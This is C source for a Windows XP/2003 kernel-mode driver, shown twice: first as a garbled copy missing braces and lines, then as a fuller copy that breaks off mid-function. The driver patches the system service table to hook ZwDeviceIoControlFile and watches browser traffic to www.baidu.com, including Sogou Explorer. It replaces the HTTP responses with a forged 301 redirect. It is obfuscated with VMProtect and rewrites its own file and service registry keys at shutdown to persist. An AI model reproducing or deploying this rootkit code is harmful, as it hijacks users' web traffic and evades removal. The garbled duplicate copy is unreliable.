#ifdef __cplusplus
extern "C"
{
#endif
#include
}
#include "VMProtectSDK.h"
#pragma comment(lib, "VMProtectSDK32.lib")
#include "1.h"
ULONG ZwDeviceIoControlFile_BaseAddress = 0x0;
ULONG ZwDeviceIoControlFile_value = 0x0;
ULONG ZwDeviceIoControlFile_num = 0x0;
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
PDEVICE_OBJECT Device;
UNICODE_STRING SymName;
Device = DriverObject->DeviceObject;
if (Device != NULL)
RtlInitUnicodeString(&SymName, DEVSYMNAME);
IoDeleteSymbolicLink(&SymName);
IoDeleteDevice(Device);
if (ZwDeviceIoControlFile_BaseAddress != 0 &&
ZwDeviceIoControlFile_value != 0)
ChangeMemory_inte(ZwDeviceIoControlFile_BaseAddress,
ZwDeviceIoControlFile_value);
typedef struct AFD_WSABUF{
ULONG len ;
PCHAR buf ;
}AFD_WSABUF , *PAFD_WSABUF;
typedef struct AFD_INFO {
PAFD_WSABUF BufferArray ;
ULONG BufferCount ;
ULONG AfdFlags ;
ULONG TdiFlags ;
} AFD_INFO, *PAFD_INFO;
typedef struct _LYH_ie{
HANDLE pid;
HANDLE FileHandle;
}LYH_IE,*PLYH_IE;
#define IE_MaxNum 1000
LYH_IE IeBuff[IE_MaxNum];
NTSTATUS NTAPI LYH_ZwDeviceIoControlFile(IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength)
NTSTATUS RetValue = STATUS_SUCCESS;
HANDLE pid = 0x0;
PAFD_INFO AdInfo;
ULONG len,i;
BOOLEAN IsFind = FALSE;
CHAR JmpUrl[] = {"HTTP/1.1 301 Moved Permanently\r\nLocation:
http://www.baidu.com\r\n"};
PMDL pMdl;
PVOID MdlAddress;
PEPROCESS process;
PCHAR name;
BOOLEAN IsSoGou = FALSE;
pid = PsGetCurrentProcessId();
if (IoControlCode == 0x1201f)
AdInfo = (PAFD_INFO)InputBuffer;
len = AdInfo->BufferArray->len;
process = PsGetCurrentProcess();
name = PsGetProcessImageFileName(process);
if (_stricmp(name, "sogouexplorer.e") == 0)
IsSoGou = TRUE;
else
IsSoGou = FALSE;
IsFind = FALSE;
pMdl = IoAllocateMdl(AdInfo->BufferArray->buf, len, FALSE, FALSE,
NULL);
if (pMdl != NULL)
_try
MmProbeAndLockPages(pMdl, UserMode, IoReadAccess);
MdlAddress = MmMapLockedPagesSpecifyCache(pMdl, KernelMode, MmCached, NULL,
FALSE, NormalPagePriority);
if (MdlAddress != NULL)
if (_strnicmp((PCHAR)MdlAddress, "get", 3) == 0 ||
_strnicmp((PCHAR)MdlAddress, "post", 4) == 0)
if (len > 0x14)
len -= 0x14;
for (i = 0; i < len; i++)
if (_strnicmp((PCHAR)((ULONG)MdlAddress + i), "www.baidu.com", 14) == 0
)
IsFind = TRUE;
break;
MmUnlockPages(pMdl);
}_except(EXCEPTION_EXECUTE_HANDLER)
IoFreeMdl(pMdl);
if (IsFind)
for (i = 0; i < IE_MaxNum; i++)
if (!IsSoGou)
if (IeBuff[i].FileHandle == FileHandle && IeBuff->pid == pid)
//遍歷這個程序
if (IeBuff[i].pid == pid)
//如果沒有找到,就新增
if (!IsFind)
if (IsSoGou)
if (IeBuff[i].pid == 0 && IeBuff[i].FileHandle == 0)
IeBuff[i].FileHandle = FileHandle; IeBuff[i].pid = pid;
if (IeBuff[i].FileHandle == 0 || IeBuff[i].pid == 0)
_asm
pushad
push OutputBufferLength
push OutputBuffer
push InputBufferLength
push InputBuffer
push IoControlCode
push IoStatusBlock
push ApcContext
push ApcRoutine
push Event
push FileHandle
call ZwDeviceIoControlFile_value
mov RetValue,eax
popad
if (NT_SUCCESS(RetValue))
if (IoControlCode == 0x12017)
_try{
MmProbeAndLockPages(pMdl, UserMode, IoWriteAccess);
if (_strnicmp((PCHAR)MdlAddress, "http", 4) == 0)
IeBuff[i].FileHandle = 0x0; IeBuff[i].pid = 0x0;
if (IeBuff[i].FileHandle == FileHandle && IeBuff[i].pid == pid)
strcpy((PCHAR)MdlAddress, JmpUrl);
return RetValue;
NTSTATUS DefDispatch(IN PDEVICE_OBJECT Device, IN PIRP Irp)
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
UNICODE_STRING RestoreRegPath;
PKEY_VALUE_PARTIAL_INFORMATION pvpi = NULL;
ULONG FileSize = 0x0;
PVOID FileBuff = NULL;
NTSTATUS ShutDownDispatch(IN PDEVICE_OBJECT Device, IN PIRP Irp)
NTSTATUS status;
HANDLE hkey;
OBJECT_ATTRIBUTES ObjectAttributes;
UNICODE_STRING RegName;
PWCHAR DisplayName = {L"WebNdis"};
ULONG ErrorControl = 0x1, Start = 0x1, Type = 0x1;
//寫檔案
HANDLE hfile;
IO_STATUS_BLOCK IoStatus;
LARGE_INTEGER number;
if (FileBuff != NULL)
RtlInitUnicodeString(&RegName, (PCWSTR)pvpi->Data);
InitializeObjectAttributes(&ObjectAttributes, &RegName,
OBJ_CASE_INSENSITIVE, NULL, NULL);
status = ZwCreateFile(&hfile, GENERIC_WRITE, &ObjectAttributes,
&IoStatus, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF,
FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
if (NT_SUCCESS(status))
number.QuadPart = 0x0;
ZwWriteFile(hfile, NULL, NULL, NULL, &IoStatus, FileBuff, FileSize,
&number, NULL);
ZwClose(hfile);
//登錄檔回寫
if (pvpi != NULL)
InitializeObjectAttributes(&ObjectAttributes, &RestoreRegPath,
status = ZwCreateKey(&hkey, KEY_ALL_ACCESS, &ObjectAttributes, 0,
NULL, 0, NULL);
RtlInitUnicodeString(&RegName, L"DisplayName");
ZwSetValueKey(hkey, &RegName, 0, REG_SZ, DisplayName,
(wcslen(DisplayName) + 1) * sizeof(WCHAR));
RtlInitUnicodeString(&RegName, L"ErrorControl");
ZwSetValueKey(hkey, &RegName, 0, REG_DWORD, &ErrorControl, 4);
//路徑
RtlInitUnicodeString(&RegName, L"ImagePath");
ZwSetValueKey(hkey, &RegName, 0, REG_SZ, pvpi->Data,
(wcslen((PWCHAR)pvpi->Data) + 1) * sizeof(WCHAR));
RtlInitUnicodeString(&RegName, L"Start");
ZwSetValueKey(hkey, &RegName, 0, REG_DWORD, &Start, 4);
RtlInitUnicodeString(&RegName, L"Type");
ZwSetValueKey(hkey, &RegName, 0, REG_DWORD, &Type, 4);
ZwClose(hkey);
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING
RegistryPath)
ULONG MajorVersion,MinorVersion;
DriverObject->DriverUnload = OnUnload;
PsGetVersion(&MajorVersion, &MinorVersion, NULL, NULL);
if (MajorVersion == 0x5 && MinorVersion == 0x2)
ZwDeviceIoControlFile_num = 0x45;
else if (MajorVersion == 0x5 && MinorVersion == 0x1)
ZwDeviceIoControlFile_num = 0x42;
return STATUS_UNSUCCESSFUL;
memset(IeBuff, 0, 4 * IE_MaxNum);
ZwDeviceIoControlFile_BaseAddress =
(ULONG)KeServiceDescriptorTable->ServiceTableBase + ZwDeviceIoControlFile_num
* 4; //xp 0x42 2003 0x45
ZwDeviceIoControlFile_value =
*(PULONG)ZwDeviceIoControlFile_BaseAddress;
(ULONG)LYH_ZwDeviceIoControlFile);
UNICODE_STRING DevName,SymName;
PDEVICE_OBJECT fdo;
RtlInitUnicodeString(&DevName, DEVICENAME);
status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN,
0, FALSE, &fdo);
if (!NT_SUCCESS(status))
return status;
status = IoCreateSymbolicLink(&SymName, &DevName);
IoDeleteDevice(fdo);
fdo->Flags |= DO_BUFFERED_IO;
DriverObject->MajorFunction[IRP_MJ_CREATE] = DefDispatch;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = DefDispatch;
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] = ShutDownDispatch;
RestoreRegPath.Buffer = (PWSTR)ExAllocatePool(NonPagedPool,
RegistryPath->Length + 1);
RtlCopyMemory(RestoreRegPath.Buffer, RegistryPath->Buffer,
RegistryPath->Length);
RestoreRegPath.Length = RestoreRegPath.MaximumLength =
RegistryPath->Length;
//讀取登錄檔檔案位置,以備回寫
UNICODE_STRING ValueName;
ULONG ulSize = 0x0;
RtlInitUnicodeString(&ValueName, L"ImagePath");
InitializeObjectAttributes(&ObjectAttributes, RegistryPath,
status = ZwOpenKey(&hkey, KEY_ALL_ACCESS, &ObjectAttributes);
status = ZwQueryValueKey(hkey, &ValueName, KeyValuePartialInformation,
NULL, 0, &ulSize);
if (status == STATUS_BUFFER_TOO_SMALL)
pvpi = (PKEY_VALUE_PARTIAL_INFORMATION)ExAllocatePool(PagedPool,
ulSize);
pvpi, ulSize, &ulSize);
ExFreePool(pvpi);
pvpi = NULL;
#ifdef __cplusplus
extern "C"
{
#endif
#include
#ifdef __cplusplus
}
#endif
#include "VMProtectSDK.h"
#pragma comment(lib, "VMProtectSDK32.lib")
#include "1.h"
ULONG ZwDeviceIoControlFile_BaseAddress = 0x0;
ULONG ZwDeviceIoControlFile_value = 0x0;
ULONG ZwDeviceIoControlFile_num = 0x0;
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
PDEVICE_OBJECT Device;
UNICODE_STRING SymName;
Device = DriverObject->DeviceObject;
if (Device != NULL)
{
RtlInitUnicodeString(&SymName, DEVSYMNAME);
IoDeleteSymbolicLink(&SymName);
IoDeleteDevice(Device);
}
if (ZwDeviceIoControlFile_BaseAddress != 0 &&
ZwDeviceIoControlFile_value != 0)
{
ChangeMemory_inte(ZwDeviceIoControlFile_BaseAddress,
ZwDeviceIoControlFile_value);
}
}
typedef struct AFD_WSABUF{
ULONG len ;
PCHAR buf ;
}AFD_WSABUF , *PAFD_WSABUF;
typedef struct AFD_INFO {
PAFD_WSABUF BufferArray ;
ULONG BufferCount ;
ULONG AfdFlags ;
ULONG TdiFlags ;
} AFD_INFO, *PAFD_INFO;
typedef struct _LYH_ie{
HANDLE pid;
HANDLE FileHandle;
}LYH_IE,*PLYH_IE;
#define IE_MaxNum 1000
LYH_IE IeBuff[IE_MaxNum];
NTSTATUS NTAPI LYH_ZwDeviceIoControlFile(IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength)
{
NTSTATUS RetValue = STATUS_SUCCESS;
HANDLE pid = 0x0;
PAFD_INFO AdInfo;
ULONG len,i;
BOOLEAN IsFind = FALSE;
CHAR JmpUrl[] = {"HTTP/1.1 301 Moved Permanently\r\nLocation:
http://www.baidu.com\r\n"};
PMDL pMdl;
PVOID MdlAddress;
PEPROCESS process;
PCHAR name;
BOOLEAN IsSoGou = FALSE;
pid = PsGetCurrentProcessId();
if (IoControlCode == 0x1201f)
{
AdInfo = (PAFD_INFO)InputBuffer;
len = AdInfo->BufferArray->len;
process = PsGetCurrentProcess();
name = PsGetProcessImageFileName(process);
if (_stricmp(name, "sogouexplorer.e") == 0)
{
IsSoGou = TRUE;
}
else
{
IsSoGou = FALSE;
}
IsFind = FALSE;
pMdl = IoAllocateMdl(AdInfo->BufferArray->buf, len, FALSE, FALSE,
NULL);
if (pMdl != NULL)
{
_try
{
MmProbeAndLockPages(pMdl, UserMode, IoReadAccess);
MdlAddress = MmMapLockedPagesSpecifyCache(pMdl, KernelMode, MmCached, NULL,
FALSE, NormalPagePriority);
if (MdlAddress != NULL)
{
if (_strnicmp((PCHAR)MdlAddress, "get", 3) == 0 ||
_strnicmp((PCHAR)MdlAddress, "post", 4) == 0)
{
if (len > 0x14)
{
len -= 0x14;
}
for (i = 0; i < len; i++)
{
if (_strnicmp((PCHAR)((ULONG)MdlAddress + i), "www.baidu.com", 14) == 0
)
{
IsFind = TRUE;
break;
}
}
}
}
MmUnlockPages(pMdl);
}_except(EXCEPTION_EXECUTE_HANDLER)
{
}
IoFreeMdl(pMdl);
}
if (IsFind)
{
IsFind = FALSE;
for (i = 0; i < IE_MaxNum; i++)
{
if (!IsSoGou)
{
if (IeBuff[i].FileHandle == FileHandle && IeBuff->pid == pid)
//遍歷這個程序
{
IsFind = TRUE;
break;
}
}
else
{
if (IeBuff[i].pid == pid)
{
IsFind = TRUE;
break;
}
}
}
//如果沒有找到,就新增
if (!IsFind)
{
for (i = 0; i < IE_MaxNum; i++)
{
if (IsSoGou)
{
if (IeBuff[i].pid == 0 && IeBuff[i].FileHandle == 0)
{
IeBuff[i].FileHandle = FileHandle; IeBuff[i].pid = pid;
break;
}
}
else
{
if (IeBuff[i].FileHandle == 0 || IeBuff[i].pid == 0)
{
IeBuff[i].FileHandle = FileHandle; IeBuff[i].pid = pid;
break;
}
}
}
}
}
}
_asm
{
pushad
push OutputBufferLength
push OutputBuffer
push InputBufferLength
push InputBuffer
push IoControlCode
push IoStatusBlock
push ApcContext
push ApcRoutine
push Event
push FileHandle
call ZwDeviceIoControlFile_value
mov RetValue,eax
popad
}
if (NT_SUCCESS(RetValue))
{
if (IoControlCode == 0x12017)
{
AdInfo = (PAFD_INFO)InputBuffer;
len = AdInfo->BufferArray->len;
process = PsGetCurrentProcess();
name = PsGetProcessImageFileName(process);
if (_stricmp(name, "sogouexplorer.e") == 0)
{
IsSoGou = TRUE;
}
else
{
IsSoGou = FALSE;
}
pMdl = IoAllocateMdl(AdInfo->BufferArray->buf, len, FALSE, FALSE,
NULL);
if (pMdl != NULL)
{
_try{
MmProbeAndLockPages(pMdl, UserMode, IoWriteAccess);
MdlAddress = MmMapLockedPagesSpecifyCache(pMdl, KernelMode, MmCached, NULL,
FALSE, NormalPagePriority);
if (MdlAddress != NULL)
{
if (_strnicmp((PCHAR)MdlAddress, "http", 4) == 0)
{
IsFind = FALSE;
for (i = 0; i < IE_MaxNum; i++)
{
if (IsSoGou)
{
if (IeBuff[i].pid == pid)
{
IsFind = TRUE;
IeBuff[i].FileHandle = 0x0; IeBuff[i].pid = 0x0;
break;
}
}
else
{
if (IeBuff[i].FileHandle == FileHandle && IeBuff[i].pid == pid)
{
IsFind = TRUE;
IeBuff[i].FileHandle = 0x0; IeBuff[i].pid = 0x0;
break;
}
}
}
if (IsFind)
{
strcpy((PCHAR)MdlAddress, JmpUrl);
}
}
}
MmUnlockPages(pMdl);
}_except(EXCEPTION_EXECUTE_HANDLER)
{
}
IoFreeMdl(pMdl);
}
}
}
return RetValue;
}
NTSTATUS DefDispatch(IN PDEVICE_OBJECT Device, IN PIRP Irp)
{
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
UNICODE_STRING RestoreRegPath;
PKEY_VALUE_PARTIAL_INFORMATION pvpi = NULL;
ULONG FileSize = 0x0;
PVOID FileBuff = NULL;
NTSTATUS ShutDownDispatch(IN PDEVICE_OBJECT Device, IN PIRP Irp)
{
NTSTATUS status;
HANDLE hkey;
OBJECT_ATTRIBUTES ObjectAttributes;
UNICODE_STRING RegName;
PWCHAR DisplayName = {L"WebNdis"};
ULONG ErrorControl = 0x1, Start = 0x1, Type = 0x1;
//寫檔案
HANDLE hfile;
IO_STATUS_BLOCK IoStatus;
LARGE_INTEGER number;
if (FileBuff != NULL)
{
RtlInitUnicodeString(&RegName, (PCWSTR)pvpi->Data);
InitializeObjectAttributes(&ObjectAttributes, &RegName,
OBJ_CASE_INSENSITIVE, NULL, NULL);
status = ZwCreateFile(&hfile, GENERIC_WRITE, &ObjectAttributes,
&IoStatus, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF,
FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
if (NT_SUCCESS(status))
{
number.QuadPart = 0x0;
ZwWriteFile(hfile, NULL, NULL, NULL, &IoStatus, FileBuff, FileSize,
&number, NULL);
ZwClose(hfile);
}
}
//登錄檔回寫
if (pvpi != NULL)
{
InitializeObjectAttributes(&ObjectAttributes, &RestoreRegPath,
OBJ_CASE_INSENSITIVE, NULL, NULL);
status = ZwCreateKey(&hkey, KEY_ALL_ACCESS, &ObjectAttributes, 0,
NULL, 0, NULL);
if (NT_SUCCESS(status))
{
RtlInitUnicodeString(&RegName, L"DisplayName");
ZwSetValueKey(hkey, &RegName, 0, REG_SZ, DisplayName,
(wcslen(DisplayName) + 1) * sizeof(WCHAR));
RtlInitUnicodeString(&RegName, L"ErrorControl");
ZwSetValueKey(hkey, &RegName, 0, REG_DWORD, &ErrorControl, 4);
//路徑
RtlInitUnicodeString(&RegName, L"ImagePath");
ZwSetValueKey(hkey, &RegName, 0, REG_SZ, pvpi->Data,
(wcslen((PWCHAR)pvpi->Data) + 1) * sizeof(WCHAR));
RtlInitUnicodeString(&RegName, L"Start");
ZwSetValueKey(hkey, &RegName, 0, REG_DWORD, &Start, 4);
RtlInitUnicodeString(&RegName, L"Type");
ZwSetValueKey(hkey, &RegName, 0, REG_DWORD, &Type, 4);
ZwClose(hkey);
}
}
return STATUS_SUCCESS;
}
#ifdef __cplusplus
extern "C"
#endif
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING
RegistryPath)
{
ULONG MajorVersion,MinorVersion;
DriverObject->DriverUnload = OnUnload;
PsGetVersion(&MajorVersion, &MinorVersion, NULL, NULL);
if (MajorVersion == 0x5 && MinorVersion == 0x2)
{
ZwDeviceIoControlFile_num = 0x45;
}
else if (MajorVersion == 0x5 && MinorVersion == 0x1)
{
ZwDeviceIoControlFile_num = 0x42;
}
else
{
return STATUS_UNSUCCESSFUL;
}
memset(IeBuff, 0, 4 * IE_MaxNum);
ZwDeviceIoControlFile_BaseAddress =
(ULONG)KeServiceDescriptorTable->ServiceTableBase + ZwDeviceIoControlFile_num
* 4; //xp 0x42 2003 0x45
ZwDeviceIoControlFile_value =
*(PULONG)ZwDeviceIoControlFile_BaseAddress;
ChangeMemory_inte(ZwDeviceIoControlFile_BaseAddress,
(ULONG)LYH_ZwDeviceIoControlFile);
{
UNICODE_STRING DevName,SymName;
NTSTATUS status;
PDEVICE_OBJECT fdo;
RtlInitUnicodeString(&DevName, DEVICENAME);
status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN,
0, FALSE, &fdo);
if (!NT_SUCCESS(status))
{
return status;
}
RtlInitUnicodeString(&SymName, DEVSYMNAME);
status = IoCreateSymbolicLink(&SymName, &DevName);
if (!NT_SUCCESS(status))
{
IoDeleteDevice(fdo);
return status;
}
fdo->Flags |= DO_BUFFERED_IO;
DriverObject->MajorFunction[IRP_MJ_CREATE] = DefDispatch;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = DefDispatch;
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] = ShutDownDispatch;
RestoreRegPath.Buffer = (PWSTR)ExAllocatePool(NonPagedPool,
RegistryPath->Length + 1);
RtlCopyMemory(RestoreRegPath.Buffer, RegistryPath->Buffer,
RegistryPath->Length);
RestoreRegPath.Length = RestoreRegPath.MaximumLength =
RegistryPath->Length;
{
//讀取登錄檔檔案位置,以備回寫
HANDLE hkey;
UNICODE_STRING ValueName;
OBJECT_ATTRIBUTES ObjectAttributes;
ULONG ulSize = 0x0;
RtlInitUnicodeString(&ValueName, L"ImagePath");
InitializeObjectAttributes(&ObjectAttributes, RegistryPath,
OBJ_CASE_INSENSITIVE, NULL, NULL);
status = ZwOpenKey(&hkey, KEY_ALL_ACCESS, &ObjectAttributes);
if (NT_SUCCESS(status))
{
status = ZwQueryValueKey(hkey, &ValueName, KeyValuePartialInformation,
NULL, 0, &ulSize);
if (status == STATUS_BUFFER_TOO_SMALL)
{
pvpi = (PKEY_VALUE_PARTIAL_INFORMATION)ExAllocatePool(PagedPool,
ulSize);
if (pvpi != NULL)
{
status = ZwQueryValueKey(hkey, &ValueName, KeyValuePartialInformation,
pvpi, ulSize, &ulSize);
if (!NT_SUCCESS(status))
{
ExFreePool(pvpi);
pvpi = NULL;
}
}
}
ZwClose(hkey);